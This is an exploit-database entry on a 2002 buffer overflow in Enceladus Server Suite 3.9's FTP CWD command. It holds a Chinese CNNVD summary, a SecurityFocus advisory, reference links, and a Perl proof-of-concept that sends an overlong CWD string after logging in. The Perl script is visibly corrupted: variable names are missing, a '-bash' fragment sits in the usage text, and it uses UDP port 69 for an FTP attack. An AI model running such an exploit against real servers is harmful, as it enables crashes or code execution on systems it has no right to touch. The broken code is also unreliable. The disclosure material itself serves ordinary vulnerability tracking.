https://www.exploit-db.com/exploits/22081
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-081

Enceladus服务器套件3.9版本存在漏洞。因此远程攻击者可以借助超长CD（CWD）命令执行任意代码。

source: http://www.securityfocus.com/bid/6345/info

Enceladus Server Suite is prone to a remotely exploitable buffer overflow vulnerability. It is possible to trigger this condition by supplying an overly long value for several FTP commands. To exploit this issue, the attacker must be able to authenticate to the FTP server included in Enceladus and issue a maliciously crafted command.

Successful exploitation will enable a remote attacker to execute arbitrary code with the privileges of the Enceladus Server Suite software, which will most likely run with SYSTEM (or equivalent) privileges. This vulnerability may also be used to cause a denial of service.

This issue has been reported for Enceladus Server Suite 3.9. Other versions may also be affected.


#!/usr/bin/perl -w



use IO::Socket;



 = "Mollensoft Software Enceladus Server Suite 3.9";



unless (@ARGV == 3) {

 print "n By Sapient2003n";

 die "usage: -bash <host to exploit> <user> <password>n";

}

print "n By Sapient2003n";



 = "A" x 500;

 = "USER [1]nPASS [2]nCWD ";



 = IO::Socket::INET->new(

        PeerAddr => [0],

        PeerPort => 69,

        Proto    => "udp",

) or die "Can't find host [0]n";

print  ;

print "Attempted to exploit [0]n";

close();

来源:BID
名称:6345
链接:http://www.securityfocus.com/bid/6345
来源:BUGTRAQ
名称:20021219MultiplevulnerabilityinEnceladusServer
链接:http://www.securityfocus.com/archive/1/303990
来源:XF
名称:enceladus-cd-bo(10802)
链接:http://www.iss.net/security_center/static/10802.php
来源:VULNWATCH
名称:20021209[SecurityOffice]EnceladusServerSuitev3.9BufferOverflowVulnerability
链接:http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0097.html
来源:BUGTRAQ
名称:20021209[SecurityOffice]EnceladusServerSuitev3.9BufferOverflowVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0074.html